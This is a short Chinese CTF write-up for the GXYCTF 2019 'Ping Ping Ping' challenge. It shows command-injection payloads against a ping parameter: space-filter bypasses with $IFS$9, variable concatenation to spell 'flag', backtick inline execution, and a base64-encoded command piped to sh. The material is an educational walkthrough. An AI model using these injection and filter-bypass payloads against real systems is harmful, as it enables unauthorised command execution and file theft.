GXYCTF 2019 | 题目解析之Ping Ping Ping
无名草
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
GXYCTF 2019 | 题目解析之Ping Ping Ping
Ping Ping Ping
进入题目
肯定先Ping一下本地IP:127.0.0.1能连接上
然后用**ls**关键字列出当前目录的内容
接着我们肯定想查看flag.php里面的值
用**cat**命令查看文件内容,
还有其他查看命令主要是tac,head,more,tail,less显示空格被过滤了;
一般空格过滤绕过的方法:
{cat,flag}; ${IFS$; $IFS$9; <; <>;
经过测试用空格用**$IFS$9**绕过;
然后变量**拼接,倒序**得到payload:
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$1$b$a.php 也可以?ip=127.0.0.1;a=lag;cat$IFS$9f$a.php
解法2:
内联执行绕过
将**反引号内**命令的输出作为输入执行
?ip=|cat$IFS$9`ls`
解法3:
虽然过滤了bash,但没过滤sh,可以使用下面的方法:
ip=1;echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh
推荐写的***很好***的关于此类题目的文章
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 无名草 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏

相关推荐
文件上传解析漏洞(三)
2022-03-27
服务器端请求伪造--SSRF
2022-03-24
逻辑漏洞之支付漏洞
2022-03-19
文章目录